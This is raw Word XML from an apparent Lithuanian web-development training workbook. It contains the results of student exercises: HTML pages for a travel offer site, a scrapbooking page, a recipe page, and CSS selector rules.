        <w:t>iau.html</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lt;html&gt;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itle&gt;www praktinis darbas&lt;/tit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charset="UTF-8"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author" content="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keywords" content="HTML,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description" content="TOP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2&gt;Kelionės&lt;/h2&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lastRenderedPageBreak/>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index.html"&gt;Paskutinė minutė&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poilsines.html"&gt;Poilsinės kelionė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datos.html"&gt;Kelionių dato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Polsinės kelionės&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4&gt;Ispanija, Kosta Dorada (Plačiau)&lt;/h4&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img src="../img/barcelona.jpg" alt="paveiksliukas" width="300"&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Paskutinės minutės atostogos Ispanijoje, Salou! Skrydis iš Vilniaus, &lt;br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bagažas, pervežimai ir 7 n. viešbutyje su pusryčiais ir vakarienėmis - 379 &amp;euro;!&lt;/p&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Išvykimo laikai&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Vilnius - Barselona 14:00 - 16:30&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Barselona - Vilnius 17:30 - 22:00&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pP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Į kelionės kainą įskaičiuota:&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Skrydis Vilnius - Barselona - Vilniu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Pervežimas oro uostas - viešbutis - oro uosta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20 kg registruojamas ir rankinis bagažas;&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7 n. apgyvendinimas pasirinktame viešbutyje su nurodytu &lt;br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maitinimo tipu.&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a href="poilsines.html"&gt;Grįžti&lt;/a&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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0040276F" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="360" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="002C4AFA">
        <w:t>2.3.</w:t>
      </w:r>
      <w:r w:rsidR="004D5FA8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC20A8" w:rsidRPr="00AD4464">
        <w:t>Poilsinė</w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>s.html</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lt;html&gt;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title&gt;www praktinis darbas&lt;/title&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charset="UTF-8"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author" content="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keywords" content="HTML,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meta name="description" content="TOP Kelionės"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ead&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2&gt;Kelionės&lt;/h2&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index.html"&gt;Paskutinė minutė&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poilsines.html"&gt;Poilsinės kelionė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li&gt;&lt;a href="datos.html"&gt;Kelionių datos&lt;/a&gt;&lt;/li&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3&gt;Poilsinės kelionės&lt;/h3&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4&gt;Ispanija, Kosta Dorada&lt;/h4&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img src="../img/barcelona.jpg" alt="paveiksliukas" width="300"&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Paskutinės minutės atostogos Ispanijoje, Salou! Skrydis iš Vilniaus, &lt;br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bagažas, pervežimai ir 7 n. viešbutyje su pusryčiais ir vakarienėmis - 379 &amp;euro;! &lt;a href="placiau.html"&gt;Plačiau...&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&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h4&gt;Kreta&lt;/h4&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img src="../img/kreta.jpg" alt="paveiksliukas" width="300"&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p&gt;Rugsėjį keliauk į vaizdingąją Kretą! Skrydis iš Vilniaus, bagažas, pervežimai ir 7 n.&lt;br /&gt; viešbutyje su „viskas įskaičiuota“ – 499 &amp;euro;! &lt;a href="placiau.html"&gt;Plačiau...&lt;/a&gt;&lt;/p&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 xml:space="preserve">    &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pP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bCs w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0019613A" w:rsidRPr="0019613A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PATEIKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="0019613A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> TURINĮ HTML ŽYMĖJIMO KALBA (NAUJIENŲ SRAUTAS)</w:t>
      </w:r>
      <w:r w:rsidR="00555838">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A"/>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="928"/>
        </w:tabs>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>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DOCTYPE HTM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tml lang="lt"&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eta charset="utf-8" /&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title&gt;Prisiminimų dirbtuvės "Scrap"&lt;/title&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eta name="keywords" content="praktika" /&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1 id="top"&gt;Prisiminimų dirbtuvės "Scrap"&lt;/h1&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gt;Pagrindinės temos&lt;/h2&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apie"&gt;Kas yra skrebinimas ir kokia jo vertė&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rusys"&gt;Skrebinimo rūšy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irankiai"&gt;Skrebinimo įrankiai&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 id="apie"&gt;Kas yra skrebinimas ir kokia jo vertė&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Skrebinimas - įdomi veikla. Vienus ji įtraukia, kitiems atrodo beprasmiška. Mėgstantis popieriaus spalvų, faktūrų ir ramaus kūrimo teikiamą džiaugsmą, tikėtina, išbandęs skrebinimą nebegalės sustoti, nes pats procesas įtraukia taip, jog galima paskęsti jame ilgoms valandoms. Skrebinimo tikslas - įamžinti akimirkas, kad jos liktų prisiminimu, o ne išnyktų negrįžtamai mūsų praeityje.&lt;/p&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Išgirdę apie skrebinimą nieko apie jį nežinantys žmonės tik klausiamai pakelia antakius, o papasakojus detaliau, kilsteli ir pečius. Tai atrodo tokia paprasta ir jokios apčiuopiamos naudos neduodanti veikla. Bet tereikia išsitraukti trumpam parodyti albumą ir tada skrebinimas įgauna prasmę. Mes turime socialinius tinklus, kuriuos kartas nuo karto, atiduodami savo privatumą, pildome kasdieniais įspūdžiais. Tai taip pat dalis mūsų istorijos. Visgi, vargu, ar kada nors, po penkių ar dešimties metų, atsikėlę nuo Kalėdų stalo, išsitrauksime mobiliuosius, kad kartu prisimintume praėjusius metus. Bet esu tikra, kad vartysime albumus – po penkių, po dešimties ir juo labiau po dvidešimties metų, kai vaikai paliks namus ir tuščias lizdas atrodys toks didelis. Žinau, kad vartys ir mano vaikai. Kodėl? Todėl, kad jie tai daro jau dabar...&lt;a href="#"&gt;Plačiau&lt;/a&gt;&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img src="https://i.pinimg.com/736x/d0/5c/53/d05c531429eec58c0ce82c4b5562d2dd--travelling-photos-travelling-scrapbook.jpg" alt="foto iš interneto" width="300" height="300" /&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Skrebinimas - hobis ne tik suaugusiems. Jis ypatingai naudingas ir vaikams, nes:&lt;/p&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avina emocinį intelektą&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Skatina kurti&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Ugdo kantrybę&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avina smulkiąją motoriką&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 href="#top"&gt;TOP&lt;/a&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 id="rusys"&gt;Skrebinimo rūšys&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img src="https://iy.delfi.lt/norm/102523/4410329_pBMJIq.jpeg" alt="pavyzdys" width="300" height="300"&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Galima išskirti keletą skrebinimo rūšių.&lt;/p&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Tradicinis skrebas&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Tradicinis skrebukas kuriamas naudojant nedidelį kiekį nuotraukų (dažniausiai vieną), didelė dėmesį skiriant puošybos elementams ir detalėms. Kaip ir kiti skrebukai, tradicinis skrebukas turi turėti pavadinimą (temą) arba žinutę nešančią frazę, kuri šiuo atveju tampa pagrindiniu akcentu. Tradiciniuose skrebuose ne visada sutiksite aprašymus (angl. journaling), tačiau nuotrauka ir frazė yra būtini. Plačiau skaitykite &lt;a href="https://en.wikipedia.org/wiki/Scrapbooking"&gt;čia&lt;/a&gt;.&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Project Life skrebas&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Project Life yra specifinė skrebinimo rūšis, kurioje nuotraukos dedamos ir įmautes su nedidelėmis kišenėlėmis. Ši skrebinimo rūšis ypatinga tuo, kad leidžia išsaugoti daug nuotraukų ir mažesnis dėmesys skiriamas puošybai.Plačiau skaitykite &lt;a href="https://beckyhiggins.com/project-life/"&gt;čia&lt;/a&gt;.&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 href="#top"&gt;TOP&lt;/a&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2 id="irankiai"&gt;Skrebinimo įrankiai&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img src="https://g2.dcdn.lt/images/pix/file54920751_ea9466a.jpg" alt="Skrebinimo irankiai" width="300" height="300"&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Ši rankdarbių rūšis - šiek tiek pavojinga, nes yra begalė įrankių, kurie naudojami kuriant skrebukus. Dažnai naujokui susisuka galva ir išsigąstama, kad skrebas - per prabangus hobis. Visgi, patys svarbiausi įrankiai yra tik keli ir juos galima rasti kiekvienuose namuose:&lt;/p&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Nuotraukos&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Žirklės&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Popierius&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Klijai&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Ir pagrindinis - VAIZDUOTĖ!&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 href="#top"&gt;TOP&lt;/a&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tml&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="294" w:name="_Toc13833443"/>
      <w:bookmarkStart w:id="295" w:name="_Toc14392509"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Apipavidalinti internetinį puslapį naudojant pakopinius stilių šablonus ir karkasus.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="294"/>
      <w:bookmarkEnd w:id="295"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009B6502">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009B6502" w:rsidRPr="00E42A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UŽRAŠYKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS STILIAUS TAISYKLES (CSS SELEKTORIAI</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00E42A78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00792E84" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1B2733"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="000F6F8F">
        <w:rPr>
          <w:color w:val="1B2733"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000F6F8F" w:rsidRPr="00E42A78">
        <w:rPr>
          <w:color w:val="1B2733"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA0174" w:rsidRPr="00E42A78">
        <w:rPr>
          <w:color w:val="1B2733"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0072022D">
        <w:rPr>
          <w:color w:val="1B2733"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>indexEx.htm</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htm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head&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meta charset="UTF-8"&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title&gt;Selectors Exercise&lt;/title&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nk rel="stylesheet" type="text/css" href="styleEx.css"&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head&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body&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1&gt;Selectors Exercise&lt;/h1&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PARAGRAPH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 class="hello"&gt;I am a paragraph with a class&lt;/p&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 id="special"&gt;I am a paragraph with an ID&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2&gt;I am an awesome h2 &lt;/h2&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3&gt;I am an awesome h3 &lt;/h3&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 id="special2"&gt;Roof party yr hella synth, Wes Anderson narwhal four dollar toast before they sold out retro lo-fi. Austin iPhone pop-up farm-to-table, PBR McSweeney's ennui messenger bag distillery before they sold out Portland wolf fanny pack YOLO. Locavore slow-carb trust fund farm-to-table. Pinterest gastropub lo-fi, McSweeney's </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42A78">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>trust fund VHS shabby chic ugh Austin twee. Messenger bag banjo lumbersexual, whatever 3 wolf moon &lt;span&gt;XOXO (red)&lt;/span&gt; normcore. Pug fanny pack 3 wolf moon, typewriter organic chia mustache scenester seitan shabby chic Blue Bottle salvia ugh iPhone. Fanny pack Williamsburg direct trade, cold-pressed disrupt flannel listicle health goth asymmetrical freegan mixtape street art pour-over whatever.&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2&gt;Things I need to do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alk Dog &lt;input type="checkbox" checked&gt;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Feed Dog &lt;input type="checkbox" checked&gt;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ash Dog &lt;input type="checkbox"&gt;&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2 class="hello"&gt;I am another awesome h2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Cardigan Tumblr mlkshk, fap tilde 3 wolf moon Portland. Heirloom health goth taxidermy blog lo-fi selfies, post-ironic master cleanse fingerstache normcore. Kickstarter plaid twee, bespoke single-origin coffee sustainable lo-fi vinyl Pinterest pork belly &lt;em&gt;cronut skateboard&lt;/em&gt; 3 wolf moon. Normcore single-origin coffee salvia, bespoke Austin swag Godard before they sold out kogi disrupt locavore. Lumbersexual Shoreditch Vice, artisan American Apparel master cleanse yr salvia vegan. Bespoke letterpress &lt;span&gt;XOXO&lt;/span&gt; heirloom kale chips deep v four loko. Lomo sustainable put a bird on it trust fund post-ironic&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I'm the second paragraph inside this div!&lt;/p&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PARAGRAPH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h2&gt;A less awesome h2 &lt;/h2&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Roof party yr hella synth, Wes Anderson narwhal four dollar toast before they sold out retro lo-fi. Austin iPhone pop-up farm-to-table, PBR&amp;B McSweeney's ennui messenger bag distillery before they sold out Portland wolf fanny pack YOLO. Locavore slow-carb trust fund farm-to-table. Pinterest gastropub lo-fi, McSweeney's trust fund VHS shabby chic ugh Austin twee. Messenger bag banjo lumbersexual, whatever 3 wolf moon XOXO normcore. Pug fanny pack 3 wolf moon, typewriter organic chia mustache scenester seitan shabby chic Blue Bottle salvia ugh iPhone. Fanny pack Williamsburg direct trade, cold-pressed disrupt flannel listicle health goth asymmetrical freegan mixtape street art pour-over whatever&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One last paragraph here!&lt;/p&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 Lis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 Dog&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 Dog&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 Cat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 Mouse</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div&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PARAGRAPH NOT INSIDE A DIV&lt;/p&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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </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p&gt; List NOT inside a DIV&lt;/p&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 Dog&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Dog Dog&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 Cat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 Mouse</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Mouse Mouse&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li&gt;</w:t>
      </w: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 xml:space="preserve">    &lt;/ul&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E42A78">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="005C2F9A" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00E42A78">
        <w:t>styleEx.cs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xml:space="preserv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xml:space="preserve">Style the HTML elements according to the following instructions.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RITE ONLY CS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Give the &lt;body&gt; element a background of lightgray*/</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ackground-color: lightgray;</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Make the &lt;h1&gt; element purpl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h1{</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color: purpl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Make all &lt;h2&gt; and &lt;h3&gt; elements orang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h2, h3{</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color: orang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Make all the &lt;p&gt;'s that are nested inside of divs 25px font(font-size: 25px)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div &gt; p{</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font-size: 25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Give everything with the class 'hello' a white background*/</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hello{</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ackground-color: white;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>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Give the element with id 'special' a 2px solid blue border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special{</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order: 2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order-style: solid;</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lastRenderedPageBreak/>
        <w:t>    border-color: blu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Make the &lt;span&gt; element in &lt;p&gt; element with id 'special2' a 2px solid red border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special2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E42A78">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E42A78">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>span{</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order: 2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order-style: solid;</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border-color: red;</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Change the style of multilevel list in &lt;div&gt; element: first level of list darkblue, second - puppl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div ul{</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color: purpl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div &gt; ul{</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    color: darkblu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E42A78">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-TW"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Bendras rezultatas naršyklėje turi atrodyti taip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45B62995" wp14:editId="786622A0">
            <wp:extent cx="6122670" cy="2769870"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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2670" cy="2769870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="014B4ABE" wp14:editId="407EFCD1">
            <wp:extent cx="6122670" cy="2226310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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2670" cy="2226310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62B5B4B1" wp14:editId="6FE1DCA4">
            <wp:extent cx="6122670" cy="2690495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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2670" cy="2690495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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2 užduotis</w:t>
      </w:r>
      <w:r w:rsidR="00E54384">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E54384" w:rsidRPr="00E54384">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UŽRAŠYKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E54384">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSS STILIAUS TAISYKLES (RECEPTAI)</w:t>
      </w:r>
      <w:r w:rsidR="00E54384">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0099101E" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00F42677">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>index.html</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DOCTYPE htm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tml lang="e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eta charset="UTF-8"&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title&gt;Document&lt;/title&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nk rel="stylesheet" href="style.css"&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ead&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eader class="container"&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1&gt;Recipes&lt;/h1&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Lorem ipsum dolor sit amet, consectetur adipisicing elit. &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sandwiche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cupcake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hot drink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eader&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ain&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rticle&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 class="container description"&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Description&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p&gt;This peanut butter and jelly sandwich is my favorite sandwich. It has the perfect balance of ingredients and looks great when made right.&lt;/p&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 class="container"&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img src="https://image.flaticon.com/icons/png/512/63/63035.png" alt="sandwich" width="200" height="200"&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Ingredients&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2 slices of white bread&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1 jar of grape jelly&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1 jar of creamy peanut butter&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butter knife&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sharp knife&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A cutting board&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lastRenderedPageBreak/>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 class="container description"&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3&gt;Directions&lt;/h3&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ay both slices of bread next to each other on a cutting board.&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ith the butter knife, spread a 1/8 inch layer of peanut butter on the left side&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On the right side, spread a 1/8 inch layer of jelly.&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Carefully place the two halves together so that the jelly is on top.&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With the sharp knife, carefully cut the sandwich in half.&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Enjoy the PB&amp;amp;J!&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o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section&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article&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main&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footer class="container"&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sandwiche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cupcake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li&gt;&lt;a href="#"&gt;hot drinks&lt;/a&gt;&lt;/li&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ul&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nav&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h5&gt;Copyright &amp;copy; 2008 — 2018 